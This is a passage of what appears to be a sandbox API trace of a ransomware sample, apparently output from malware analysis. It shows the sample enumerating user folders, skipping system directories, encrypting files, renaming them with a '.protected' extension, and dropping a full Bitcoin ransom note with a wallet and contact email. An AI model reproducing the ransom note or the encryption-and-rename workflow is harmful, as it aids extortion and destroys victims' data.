lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.271] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.271] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.271] CloseHandle (hObject=0x164) returned 1 [0081.273] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.273] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.273] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\RESTORE_FILES.txt") returned 160 [0081.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.274] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.274] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.275] lstrlenA (lpString="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") returned 684 [0081.275] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0081.275] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.275] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.275] CloseHandle (hObject=0x160) returned 1 [0081.275] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.275] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0081.276] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0081.276] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned 143 [0081.276] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0081.276] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0081.276] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*") returned 145 [0081.276] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: 
lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.276] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.276] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.276] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\.") returned 145 [0081.276] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.276] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.276] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.276] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.277] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\..") returned 146 [0081.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.277] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0081.277] 
lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0081.277] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0081.277] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.277] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0081.277] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0081.277] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0081.277] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0081.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0081.278] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0081.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0081.278] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0081.278] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0081.280] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.280] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0081.281] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.281] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0081.281] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0081.281] CloseHandle (hObject=0x164) returned 1 [0081.281] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected") returned 176 [0081.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.protected")) returned 1 [0081.282] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.282] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.282] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\RESTORE_FILES.txt") returned 161 [0081.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.283] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.283] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.284] lstrlenA (lpString="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") returned 684 [0081.284] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.284] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.284] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.285] CloseHandle (hObject=0x160) returned 1 [0081.285] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0081.285] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0081.285] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\RESTORE_FILES.txt") returned 151 [0081.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0081.286] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.286] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0081.286] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.286] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0081.287] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.287] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0081.287] CloseHandle (hObject=0x15c) returned 1 [0081.288] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0081.288] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0081.288] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\RESTORE_FILES.txt") returned 141 [0081.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0081.289] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.289] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, 
lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0081.290] lstrlenA (lpString="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") returned 684 [0081.290] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0081.290] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.290] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0081.290] CloseHandle (hObject=0x158) returned 1 [0081.290] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Windows") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Program Files") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="Program Files (x86)") returned -1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="$Recycle.bin") returned 1 [0081.290] lstrcmpiW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="System Volume Information") returned -1 [0081.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned 123 [0081.290] lstrcmpW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2=".") returned 1 
[0081.290] lstrcmpW (lpString1="pjkljhegncpnkpknbcohdijeoejaedia", lpString2="..") returned 1 [0081.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*") returned 125 [0081.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0081.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\.") returned 125 [0081.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.291] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.291] lstrcmpiW 